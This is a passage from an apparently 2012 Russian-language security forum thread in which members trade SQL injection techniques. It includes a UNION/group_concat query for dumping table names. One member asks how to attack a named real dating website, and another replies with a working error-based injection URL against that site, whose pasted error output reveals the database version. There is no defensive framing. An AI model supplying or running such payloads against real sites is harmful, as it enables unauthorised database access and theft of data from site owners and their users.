HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19571  
Старый 08.02.2012, 23:32
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

16 символов навело на мысль что это sql хеш , но че он в таком странном виде?

Подскажите кто нибудь хоть что-то плз .
 
Ответить с цитированием

  #19572  
Старый 09.02.2012, 00:17
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от sl1k  
sl1k said:
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .
а у тебя случяйно не blind injection??
 
Ответить с цитированием

  #19573  
Старый 09.02.2012, 00:25
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от ivan151  
ivan151 said:
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'

но вывести можго только 1024 символа
 
Ответить с цитированием

  #19574  
Старый 09.02.2012, 00:43
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...

а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?

P.S Error-based тоже юзал..
 
Ответить с цитированием

  #19575  
Старый 09.02.2012, 00:47
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
юзай mid()

а вообще LIMIT бы не мешало сначала
 
Ответить с цитированием

  #19576  
Старый 09.02.2012, 01:34
TYPUCT
Guest
Сообщений: n/a
Провел на форуме:
9412

Репутация: 0
По умолчанию

Есть идеи как нибудь раскрутить это?

Цитата:
Сообщение от None  
http://www.datingtop.net/index.php?id=10'
 
Ответить с цитированием

  #19577  
Старый 09.02.2012, 01:57
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
а у тебя случяйно не blind injection??
нет через обычный union вывожу.

cв§±uКч"‡Bњn

dс\ ґЃJК.я-йј

ЛXЫ l[Ж RЂNяїџъ

ХzWt 9:fЗРЭh.G

JyM·B>ґ
 
Ответить с цитированием

  #19578  
Старый 09.02.2012, 02:12
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от TYPUCT  
TYPUCT said:
Есть идеи как нибудь раскрутить это?
http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+

Код:
Code:
Duplicate entry '5.0.92-community' for key 1
 
Ответить с цитированием

  #19579  
Старый 09.02.2012, 02:23
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

[QUOTE="sl1k"]
sl1k said:
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ
 
Ответить с цитированием

  #19580  
Старый 09.02.2012, 02:33
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
ты руками выводиш или прогой??
и руками и прогой
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT.XYZ